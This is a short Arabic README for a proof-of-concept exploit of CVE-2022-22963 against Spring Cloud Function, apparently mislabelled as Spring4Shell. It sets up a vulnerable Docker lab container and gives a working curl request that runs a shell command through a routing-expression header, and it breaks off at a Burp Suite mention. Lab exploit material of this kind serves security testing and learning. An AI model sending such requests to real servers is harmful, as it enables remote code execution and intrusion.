
استغلال إثبات المفهوم لـ CVE-2022-22963 (Spring4Shell) مع حاوية Docker قابلة للاختراق وتنفيذ أوامر عن بعد باستخدام curl عبر تعبيرات توجيه Spring Cloud Function.
لتشغيل تطبيق SpringBoot الضعيف، قم بتشغيل حاوية docker هذه مع تعريضها للمنفذ 8080. مثال:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
أمر Curl:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
أو باستخدام Burp suite:
